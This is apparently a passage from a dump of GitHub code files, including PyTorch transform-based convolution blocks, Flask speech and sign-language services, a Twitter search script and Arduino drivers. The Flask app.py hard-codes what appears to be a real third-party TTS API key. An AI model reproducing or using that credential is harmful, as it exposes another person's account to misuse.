self.filter_from_matrix(\n i=i, j=j, size=kernel_size\n )\n if lmbda:\n ids = self.get_idx(kernel_size, lmbda)\n return torch.stack(\n tuple(\n [\n (filter_bank.view(-1, 1, kernel_size, kernel_size))[\n ids, ...\n ]\n ]\n * input_channels\n ),\n dim=0,\n ).view((-1, 1, kernel_size, kernel_size))\n if diag:\n ids = self.get_idx_diag(kernel_size)\n return torch.stack(\n tuple(\n [\n filter_bank.view(-1, 1, kernel_size, kernel_size)[\n ids, ...\n ]\n ]\n * input_channels\n ),\n dim=0,\n ).view((-1, 1, kernel_size, kernel_size))\n return torch.stack(\n tuple(\n [filter_bank.view(-1, 1, kernel_size, kernel_size)]\n * input_channels\n ),\n dim=0,\n ).view((-1, 1, kernel_size, kernel_size))\n\n @classmethod\n def alpha_rooting(self, x, alpha=1.0):\n if alpha is not None:\n return x.sign() * torch.abs(x).pow(alpha)\n else:\n return x\n\n\nclass HarmonicBlock(TransformBlock):\n def __init__(\n self,\n *args,\n type=2,\n droprate=0.5,\n **kwargs,\n ):\n super(HarmonicBlock, self).__init__(*args, **kwargs)\n self.type = type\n self.filter_bank = self.get_filter_bank(\n kernel_size=self.kernel_size, # kernel size\n input_channels=self.input_channels,\n t=self.type, # type of DCT\n lmbda=self.lmbda,\n diag=self.diag,\n ).float()\n if self._cuda:\n self.filter_bank = self.filter_bank.cuda()\n self.conv = nn.Conv2d(\n in_channels=self.filter_bank.shape[0],\n out_channels=self.output_channels,\n kernel_size=1,\n padding=0,\n stride=1,\n bias=self.bias,\n )\n if self.bn:\n self.bnorm = nn.BatchNorm2d(self.filter_bank.shape[0])\n if self.drop:\n self.dropout = nn.Dropout(droprate)\n\n @staticmethod\n def dct_matrix(t=2, N=32):\n if t == 1:\n # N- the size of the input\n # n is the column dummy index, k is the row dummy index\n res = np.zeros((N, N))\n res[:, 0] = 0.5\n for p in range(N):\n res[p, -1] = (-1) ** p\n for n in range(1, N - 1):\n for k in range(N):\n res[k, n] = np.cos(np.pi / (N - 1) * n * k)\n return res\n if t == 2:\n res = np.zeros((N, N))\n for k in range(N):\n for n in range(N):\n res[k, n] = np.cos(np.pi / (N) * (n + 0.5) * k)\n return res\n if t == 3:\n res = np.zeros((N, N))\n res[:, 0] = 0.5\n for n in range(1, N):\n for k in range(N):\n res[k, n] = np.cos(np.pi / (N) * n * (k + 0.5))\n return res\n if t == 4:\n res = np.zeros((N, N))\n for k in range(N):\n for n in range(N):\n res[k, n] = np.cos(np.pi / (N) * (n + 0.5) * (k + 0.5))\n return res\n\n def filter_from_matrix(self, i, j, size):\n mat = self.dct_matrix(t=self.type, N=size)\n fltr = (\n mat[i, : self.kernel_size]\n .reshape((-1, 1))\n .dot(mat[j, : self.kernel_size].reshape(1, -1))\n )\n return torch.as_tensor(fltr)\n\n def forward(self, x):\n in_ = x\n x = F.conv2d(\n x.float(),\n weight=self.filter_bank,\n padding=self.padding,\n stride=self.stride,\n groups=self.input_channels,\n ) # int(self.K/\n x = self.alpha_rooting(x, alpha=self.alpha_root)\n if self.noise is not None:\n x.add_(self.noise.unsqueeze(-1).unsqueeze(-1))\n if self.bn:\n x = F.relu(self.bnorm(x))\n else:\n x = F.relu(x)\n if self.drop:\n x = self.dropout(x)\n if self.use_res:\n x = self.conv(x) + self.shortcut(in_)\n else:\n x = self.conv(x)\n x = F.relu(x)\n return x\n\n\nclass HadamardBlock(TransformBlock):\n def __init__(self, *args, walsh=False, droprate=0.5, **kwargs):\n \"\"\"\n Block based on Hadamard transform. Two types of transform are usable:\n Hadamard-Walsh transform and Hadamard-Paley transform.\n \"\"\"\n super(HadamardBlock, self).__init__(*args, **kwargs)\n self.walsh = walsh\n self.filter_bank = self.get_filter_bank(\n kernel_size=self.kernel_size, # kernel size\n input_channels=self.input_channels,\n walsh=self.walsh, # type of Hadamard Transform\n lmbda=self.lmbda,\n diag=self.diag,\n ).float()\n if self._cuda:\n # Checks if cuda is available at all\n self.filter_bank = self.filter_bank.cuda()\n self.conv = nn.Conv2d(\n in_channels=self.filter_bank.shape[0],\n out_channels=self.output_channels,\n kernel_size=1,\n padding=0,\n stride=1,\n bias=self.bias,\n )\n if self.bn:\n self.bnorm = nn.BatchNorm2d(self.filter_bank.shape[0])\n if self.drop:\n self.dropout = nn.Dropout(droprate)\n\n def filter_from_matrix(self, i, j, size):\n def paley(n):\n N = 2 ** n\n P_1 = np.array([1])\n P_2 = np.block([[np.kron(P_1, [1, 1])], [np.kron(P_1, [1, -1])]])\n if N == 1: # n=0\n return P_1\n elif N == 2: # n=1\n return P_2\n else:\n i = 2\n while i >= 2 and i <= n:\n P_1 = P_2\n P_2 = np.block(\n [[np.kron(P_1, [1, 1])], [np.kron(P_1, [1, -1])]]\n )\n\n i += 1\n\n return P_2\n\n if self.walsh:\n h = hadamard(\n min(2 ** (size - 1).bit_length(), 1024)\n ) # /np.sqrt(32)\n else:\n h = paley(size)\n f = np.dot(h[i, :size].reshape(-1, 1), h[j, :size].reshape(1, -1))\n return torch.as_tensor(f)\n\n def forward(self, x):\n in_ = x\n x = F.conv2d(\n x.float(),\n weight=self.filter_bank,\n padding=self.padding,\n stride=self.stride,\n groups=self.input_channels,\n ) # int(self.K/\n x = self.alpha_rooting(x, alpha=self.alpha_root)\n if self.noise is not None:\n x.add_(self.noise.unsqueeze(-1).unsqueeze(-1))\n if self.bn:\n x = F.relu(self.bnorm(x))\n else:\n x = F.relu(x)\n if self.drop:\n x = self.dropout(x)\n if self.use_res:\n x = self.conv(x) + self.shortcut(in_)\n else:\n x = self.conv(x)\n x = F.relu(x) # ?? do we need this relu layer?\n return x\n\n\nclass SlantBlock(TransformBlock):\n def __init__(self, *args, droprate=0.5, **kwargs):\n super(SlantBlock, self).__init__(*args, **kwargs)\n self.filter_bank = self.get_filter_bank(\n kernel_size=self.kernel_size, # kernel size\n input_channels=self.input_channels,\n lmbda=self.lmbda,\n diag=self.diag,\n ).float()\n if self._cuda:\n self.filter_bank = self.filter_bank.cuda()\n self.conv = nn.Conv2d(\n in_channels=self.filter_bank.shape[0],\n out_channels=self.output_channels,\n kernel_size=1,\n padding=0,\n stride=1,\n bias=self.bias,\n )\n if self.bn:\n self.bnorm = nn.BatchNorm2d(self.filter_bank.shape[0])\n if self.drop:\n self.dropout = nn.Dropout(droprate)\n\n def filter_from_matrix(self, i, j, size):\n def slant(n):\n N = (2 ** (size - 1)).bit_length()\n S_1 = 1 / np.sqrt(2) * np.array([[1, 1], [1, -1]])\n\n an = np.sqrt((2 * N ** 2) / (4 * N ** 2 - 1)) # a2\n bn = np.sqrt((N ** 2 - 1) / (4 * N ** 2 - 1)) # b2\n\n S_2 = (\n 1\n / np.sqrt(2)\n * np.array(\n [\n [1, 0, 1, 0],\n [an, bn, -an, bn],\n [0, 1, 0, -1],\n [-bn, an, bn, an],\n ]\n )\n )\n\n S_2 = np.matmul(S_2, block_diag(S_1, S_1))\n\n if N == 2:\n return S_1\n elif N == 4:\n return S_2\n else:\n S_prev = S_2\n i = 3\n while i >= 3 and i <= n:\n N = 2 ** i\n an = np.sqrt((3 * N ** 2) / (4 * N ** 2 - 1)) # a2\n bn = np.sqrt((N ** 2 - 1) / (4 * N ** 2 - 1))\n An1 = np.array([[1, 0], [an, bn]])\n An2 = np.array([[1, 0], [-an, bn]])\n Bn1 = np.array([[0, 1], [-bn, an]])\n Bn2 = np.array([[0, -1], [bn, an]])\n S_N = np.block(\n [\n [\n An1,\n np.zeros((2, N // 2 - 2)),\n An2,\n np.zeros((2, N // 2 - 2)),\n ],\n [\n np.zeros((N // 2 - 2, 2)),\n np.eye(N // 2 - 2),\n np.zeros((N // 2 - 2, 2)),\n np.eye(N // 2 - 2),\n ],\n [\n Bn1,\n np.zeros((2, N // 2 - 2)),\n Bn2,\n np.zeros((2, N // 2 - 2)),\n ],\n [\n np.zeros((N // 2 - 2, 2)),\n np.eye(N // 2 - 2),\n np.zeros((N // 2 - 2, 2)),\n -np.eye(N // 2 - 2),\n ],\n ]\n )\n\n S_N = (\n 1\n / np.sqrt(2)\n * np.matmul(S_N, block_diag(S_prev, S_prev))\n )\n S_prev = S_N\n i += 1\n return S_prev\n\n s = slant(min(size, 8)) # /np.sqrt(32)\n f = np.dot(s[i, :size].reshape(-1, 1), s[j, :size].reshape(1, -1))\n return torch.as_tensor(f)\n\n def forward(self, x):\n in_ = x\n x = F.conv2d(\n x.float(),\n weight=self.filter_bank,\n padding=self.padding,\n stride=self.stride,\n groups=self.input_channels,\n ) # int(self.K/\n x = self.alpha_rooting(x, alpha=self.alpha_root)\n if self.noise is not None:\n x.add_(self.noise.unsqueeze(-1).unsqueeze(-1))\n if self.bn:\n x = F.relu(self.bnorm(x))\n else:\n x = F.relu(x)\n if self.drop:\n x = self.dropout(x)\n if self.use_res:\n x = self.conv(x) + self.shortcut(in_)\n else:\n x = self.conv(x)\n x = F.relu(x) # ?? do we need this relu layer?\n return x\n\n\nclass ResNextTransofrmBlock(nn.Module):\n expansion = 2\n\n def __init__(\n self,\n input_channels,\n cardinality,\n transform_conv,\n bottleneck_width=4,\n stride=1,\n ):\n super(ResNextTransofrmBlock, self).__init__()\n\n self.conv0 = transform_conv(\n input_channels, kernel_size=3, padding=1, stride=1, lmbda=2\n )\n self.bn0 = nn.BatchNorm2d(self.conv0.filter_bank.size(0))\n group_width = cardinality * bottleneck_width\n self.linear = nn.Conv2d(\n in_channels=self.conv0.filter_bank.shape[0],\n out_channels=group_width,\n kernel_size=1,\n padding=0,\n stride=1,\n bias=False,\n )\n self.bn1 = nn.BatchNorm2d(group_width)\n self.conv2 = nn.Conv2d(\n group_width,\n group_width,\n kernel_size=3,\n stride=stride,\n padding=1,\n groups=cardinality,\n bias=False,\n )\n self.bn2 = nn.BatchNorm2d(group_width)\n self.conv3 = nn.Conv2d(\n group_width,\n self.expansion * group_width,\n kernel_size=1,\n bias=False,\n )\n self.bn3 = nn.BatchNorm2d(self.expansion * group_width)\n self.shortcut = nn.Sequential()\n if stride != 1 or input_channels != self.expansion * group_width:\n self.shortcut = nn.Sequential(\n nn.Conv2d(\n input_channels,\n self.expansion * group_width,\n kernel_size=1,\n stride=stride,\n bias=False,\n ),\n nn.BatchNorm2d(self.expansion * group_width),\n )\n\n def forward(self, x):\n # transform -> normalize -> activate -> linear combination\n out = self.linear(F.relu(self.bn0(self.conv0(x))))\n out = F.relu(self.bn1(out))\n out = F.relu(self.bn2(self.conv2(out)))\n out = self.bn3(self.conv3(out))\n out += self.shortcut(x)\n out = F.relu(out)\n\n return out\n\n\ndef test():\n return\n\n\nif __name__ == \"__main__\":\n test()\n","repo_name":"iliailmer/transform_based_module","sub_path":"layers/transform_blocks.py","file_name":"transform_blocks.py","file_ext":"py","file_size_in_byte":18654,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"11566790111","text":"import keyboard #pip install keyboard\nfrom camera import VideoCamera\nfrom flask import Flask, render_template, Response, stream_with_context, request\nimport cv2\nfrom sign_to_text import Sign2Text\nfrom time import sleep\nimport requests\nimport ffmpeg\nimport speech_recognition as sr\n\napp = Flask(__name__)\n# camera = cv2.VideoCapture(0)\nSign2Text_model = Sign2Text(cnn_model_path='./Model/InceptionV3_30epochs.h5', knn_model_path='./knn_model.sav')\nframe = None\nstart_point = (50, 50)\nwidth = 300\nheight = 300\nend_point = (start_point[0] + width, start_point[1] + height)\ncolor = (255, 0, 0)\nthickness = 2\ntext_display = ''\n\ndef gen_frames(camera):\n global frame\n while True:\n success, frame = camera.read() # read the camera frame\n frame = cv2.flip(frame, 1)\n frame = cv2.rectangle(frame, start_point, end_point, color, thickness)\n if not success:\n break\n else:\n _, buffer = cv2.imencode('.jpg', frame)\n frame_bytes = buffer.tobytes()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame_bytes + b'\\r\\n') # concat frame one by one and show result\n\ndef sign2text():\n global frame\n if frame is None:\n return None\n img = frame[start_point[1]:start_point[1] + height, start_point[0]:start_point[0] + width, :]\n pred_class, prob = Sign2Text_model.predict(img)\n return pred_class\n\n@app.route('/', methods=['GET'])\ndef index():\n return render_template('layout.html')\n\n@app.route('/video_feed')\ndef video_feed():\n return Response(gen_frames(VideoCamera()), mimetype='multipart/x-mixed-replace; boundary=frame')\n\n@app.route('/text_feed')\ndef text_feed():\n global text_display\n pred_word = sign2text()\n text_display += pred_word\n return text_display\n\n@app.route('/test_mic')\ndef test():\n return render_template('test_mic.html')\n\n@app.route('/speech2text', methods=['POST'])\ndef speech2text():\n file = request.files['file']\n inp_file = 'upload/uploaded_record.wav'\n file.save(inp_file)\n\n out_file = \"./upload/uploaded_record_conv.wav\"\n ffmpeg.input(inp_file).output(out_file, ar=16000, ac=1, ab=256000).overwrite_output().run()\n r = sr.Recognizer()\n with sr.AudioFile(out_file) as source:\n audio = r.listen(source)\n try:\n text = r.recognize_google(audio,language=\"vi-VI\")\n return text\n except:\n return \"Xin lỗi! tôi không nhận được voice!\"\n\n@app.route('/text2speech', methods=['GET'])\ndef text2speech():\n global text_display\n url = 'https://api.fpt.ai/hmi/tts/v5'\n input_text = text_display\n text_display = \"\"\n # input_text = 'xin chào mọi người ở shecodes hackathon'\n voice_option = ['leminh', 'thuminh']\n voice_id = int(request.args.get('voice'))\n\n headers = {\n 'api-key': '1AGd8nuJW3sz3qbfyAwqii1XHPrBZAlA',\n 'speed': '',\n 'voice': voice_option[voice_id]\n }\n response = requests.request('POST', url, data=input_text.encode('utf-8'), headers=headers)\n return response.json()['async']\n \nif __name__ == '__main__':\n app.run(host='localhost', debug=True)","repo_name":"tlhnhi/shape-of-voice","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"99"} +{"seq_id":"2464411146","text":"#Name: Mary Shalin Stanley\n#Display first 50 tweets that has prticular keywords / from a region\n\nimport const\nimport tweepy\nfrom tweepy import Stream\nfrom tweepy.streaming import StreamListener\n\n\nclass TweetListener(StreamListener):\n def on_data(self, data):\n print(data)\n return True\n def on_error(self, status):\n print(status)\n\n#define a main() so that the variable will be local to main(), instead of global\ndef main():\n auth = tweepy.OAuthHandler(const.CONSUMER_KEY, const.CONSUMER_SECRET) #Twitter requires all requests to use OAuth for authentication\n auth.set_access_token(const.ACCESS_TOKEN, const.ACCESS_TOKEN_SECRET) # set access to user's access key and access secret\n api = tweepy.API(auth) # calling the api\n api = tweepy.API(auth, wait_on_rate_limit=True)\n twitterStream =(auth, TweetListener())\n search_result = api.search(q = ['Ohio', 'weather'], count = 50)\n searches = api.search(geocode=\"39.758949,-84.191605,25mi\", count=50)\n c=1;\n d=1;\n print(\"\\n ******* a).Results for first 50 tweets that contain these two keywords: [Ohio,weather]*******\")\n for search in search_result:\n print(\"Tweet\", c, \":\", search.text)\n c=c+1;\n print(\"\\n ******* b).Results for first 50 tweets that originated from Dayton region *******\")\n for searched in searches:\n print(\"Tweet\",d,\":\", searched.text)\n\n\n d=d+1;\n\n return #end of main\n\nif __name__==\"__main__\":\n main()\n","repo_name":"maryshalin06/mary","sub_path":"Crawling Twitter using Twitter API/API Search/Three.py","file_name":"Three.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"6236552488","text":"#Задайте список из нескольких чисел. Напишите программу, которая найдёт сумму элементов списка, стоящих на нечётной позиции.\n#Пример:\n#- [2, 3, 5, 9, 3] -> на нечётных позициях элементы 3 и 9, ответ: 12\nfrom random import randint\ndef GetNum():\n result = 0\n while True:\n a = int(input('Введите длину массива: '))\n if a > 0:\n result = a\n break\n return result\n\ndef GivList(a):\n inList = []\n for i in range(a):\n inList.append(randint(1, 10))\n return inList\n\ndef SumPoss(a):\n summ = 0\n for i in range(len(a)):\n if i % 2 != 0:\n summ+= a[i]\n return summ\n\nsize = GetNum()\nresList = GivList(size)\nbattary = SumPoss(resList)\nprint(f'Сумма нечетных элементов списка {resList} равна {battary}')","repo_name":"MilyavichusEvgenii/homeWorkPython","sub_path":"lesson_03/task_0001.py","file_name":"task_0001.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"5445996434","text":"\"\"\"ode_system.py: \n\n\"\"\"\n \n__author__ = \"Dilawar Singh\"\n__copyright__ = \"Copyright 2017-, Dilawar Singh\"\n__version__ = \"1.0.0\"\n__maintainer__ = \"Dilawar Singh\"\n__email__ = \"dilawars@ncbs.res.in\"\n__status__ = \"Development\"\n\nimport sys\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sympy as _s\nfrom sympy.abc import *\n\ndef system( ):\n A, B, C = _s.symbols( \"A B C\", cls=_s.Function)\n t = _s.abc.t\n eq1 = _s.Eq(A(t).diff(t), 1)\n eq2 = _s.Eq(B(t).diff(t), 2)\n return (eq1, eq2), (A,B)\n\ndef main():\n _s.init_printing()\n sys, vs = system()\n r = _s.dsolve(sys, vs)\n print( r )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dilawar/playground","sub_path":"Sympy/ode_system.py","file_name":"ode_system.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"99"} +{"seq_id":"15639598126","text":"\nfrom pyfirmata import Arduino, util\nimport time\nimport matplotlib.pyplot as plt\n\nboard = Arduino(\"/dev/cu.usbmodem14201\")\n\npin = board.get_pin('a:0:i')\n\nit = util.Iterator(board)\nit.start()\ndata =[] \n\nt_end = time.time() + 3\n\nwhile time.time() < t_end:\n value = pin.read()\n data.append(value)\n\nplt.plot(data)\nplt.xlabel('Time')\nplt.ylabel('Analog input')\nplt.title('Analog pin reading')\nplt.show()\n\n","repo_name":"nurobio/Acoustic_beamforming_for_the_hearing_aid","sub_path":"arduino_test_pyfirmata.py","file_name":"arduino_test_pyfirmata.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"18374720187","text":"import numpy as np\n\n\"\"\"\nndarray数组的创建方法\n\"\"\"\n\n# 1. 从Python数据类型创建,具体类型根据Python基本类型来确定\n# 列表\nx = np.array([0, 1, 2, 3])\nprint(x)\n# 元组\nx = np.array((0, 1, 2, 3))\nprint(x)\n# 混合\nx = np.array([\n [1, 2],\n [9, 8],\n (0.1, 0.2)\n])\nprint(x)\n# 2. 使用NumPy中提供的函数来创建\n# np.arange(n)\n# np.ones(shape) 根据形状来生成\n# np.zeros(shape)\n# np.full(shape, val)\n# np.eye(n) 正方形 n*n 矩阵,对角线为1,其他地方为0\n","repo_name":"snail-tech/Python-Notes","sub_path":"numpy_ex/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"36358456942","text":"import PyCmdMessenger\nimport time\nimport os\nimport logging\n\n\nif os.name == 'nt':\n comPort = \"COM8\"\nelse:\n comPort = '/dev/ttyUSB0'\n\n_current_port_id = 1\n\narduino = PyCmdMessenger.ArduinoBoard(comPort,baud_rate=115200,timeout=10)\n\n\n# List of command names (and formats for their associated arguments). These must\n# be in the same order as in the sketch.\ncommands = [[\"kWatchdog\",\"s\"],\n [\"kAcknowledge\",\"s\"],\n [\"kError\",\"s\"],\n [\"kOpenValve\",\"i\"],\n [\"kCloseValve\",\"i\"],\n [\"kStartPump\",\"\"],\n [\"kStopPump\",\"\"],\n [\"kSetPumpSpeed\",\"f\"]]\n\n\n# Initialize the messenger\ncomm = PyCmdMessenger.CmdMessenger(arduino,commands)\n#Wait for arduino to come up\nmsg = comm.receive()\nprint(msg)\n\n\ndef open_Valve(valveNumber: int) -> int:\n\n if(valveNumber >=0 or valveNumber <=7):\n comm.send(\"kOpenValve\",valveNumber)\n msg = comm.receive()\n logging.info(\"Opened valve number \" + str(valveNumber))\n\n else:\n logging.info(\"Valve number not recognized\")\n return 1\n \n return 0\n\n\ndef close_Valve(valveNumber: int) -> int:\n\n if(valveNumber >=0 or valveNumber <=7):\n comm.send(\"kCloseValve\",valveNumber)\n msg = comm.receive()\n logging.info(\"Closed valve number \" + str(valveNumber))\n\n else:\n logging.info(\"Valve number not recognized\")\n return 1\n \n return 0\n\ndef set_Pump_Speed(speed: int) -> int:\n\n if(speed >=0 or speed <=100):\n comm.send(\"kSetPumpSpeed\",speed)\n msg = comm.receive()\n logging.info(\"Set pump speed to \" + str(speed))\n\n else:\n logging.info(\"Pump speed out of bounds\")\n return 1\n \n return 0\n\n\ndef start_Pump() -> int:\n \"\"\"Function drains a specific amount of ml with the pump.\"\"\"\n comm.send(\"kStartPump\")\n\n msg = comm.receive()\n logging.info(msg[1])\n\n return 0\n\n\ndef stop_Pump() -> int:\n \"\"\"Function drains a specific amount of ml with the pump.\"\"\"\n comm.send(\"kStopPump\")\n\n msg = comm.receive()\n logging.info(msg[1])\n\n return 0","repo_name":"BIG-MAP/wp4-LLE","sub_path":"Detection/Software/software/Drivers/ValveAndMixingCmd/ValveAndMixingCmdDriver.py","file_name":"ValveAndMixingCmdDriver.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"16653717297","text":"\"\"\"This file contains the functions for service3 Implementation 1 & 2.\n\nOn a GET request, we want our program to provide a list of note lengths,\nfor our user to pick from.\n\nOn a POST request, we want out program to return a random note length..\n\"\"\"\n\n# Imports --------------------------------------------------------------\n\nimport random\n\nfrom os import environ\n\nfrom flask import Flask, request, jsonify\n\n# Flask ----------------------------------------------------------------\n\n# Create our flask application.\n\nservice3 = Flask(__name__)\n\nif environ.get(\"FLASK_ENV\").replace('\"', '') == 'production':\n service3.config.from_object('service3_config.ProductionConfig')\n\nelif environ.get(\"FLASK_ENV\").replace('\"', '') == 'testing':\n service3.config.from_object('service3_config.TestingConfig')\n\nelse:\n service3.config.from_object('service3_config.DevelopmentConfig')\n\n\n# On GET Request -------------------------------------------------------\n# Helper Functions -----------------------------------------------------\n\ndef return_rhythms_dictionary():\n \"\"\"This function is to be used with a GET request, returning a list of\n note lengths for our user to select from.\n\n Service #1 requires a list of note lengths for our user to chose from. The\n different implementations of service #3 will alter these pitch lists.\n\n When Service #3 receives a GET request, it will send the output of this\n function.\n \"\"\"\n\n # TODO: Write unit test for return_rhythms_dict() with API functionality.\n\n rhythms_dictionary = {\n \"short\": [4, 8, 16, 32],\n \"long\": [1, 2, 4],\n \"standard\": [2, 4, 8, 16],\n \"extremes\": [1, 32, 64, 128],\n \"png implementation\": [4, 8, 16, 32]\n }\n\n return rhythms_dictionary\n\n\n# Function -------------------------------------------------------------\n\n\n@service3.route('/', methods=['GET'])\ndef on_get_request():\n \"\"\"This function triggers after every get request to the endpoint '/'\"\"\"\n\n return jsonify(return_rhythms_dictionary())\n\n\n# On POST Request ------------------------------------------------------\n# Helper Functions -----------------------------------------------------\n\ndef random_note_length(common_rhythms):\n \"\"\"This function is to be used with a POST request, generating a random\n note length from a given list.\n\n Keyword Arguments:\n common_rhythms: A list of common note rhythms, in Mingus format.\n \"\"\"\n return random.choice(common_rhythms)\n\n\n# Function -------------------------------------------------------------\n\n\n@service3.route('/', methods=['POST'])\ndef on_post_request():\n \"\"\"This function triggers after every post request to the endpoint '/'\n We expect to receive a specific set of rhythms from service 1, in JSON\n format.\n\n We parse the JSON with function 'request.get_json(). This turns it into\n a python dictionary.\n\n We convert this dictionary into a list. Annoyingly because our data is\n already encapsulated as a list, this method creates a 'list inside a list'\n This is why we must use index[0] to retrieve our data.\n\n We then run this data through our random function, to return a note length.\n\n \"\"\"\n received_data = request.get_json()\n\n converted_data = list(received_data.values())\n note_length_output = random_note_length(converted_data[0])\n return jsonify(note_length_output)\n","repo_name":"joshuahigginson1/DevOps_Assessment_2","sub_path":"service3/src/service3.py","file_name":"service3.py","file_ext":"py","file_size_in_byte":3361,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"}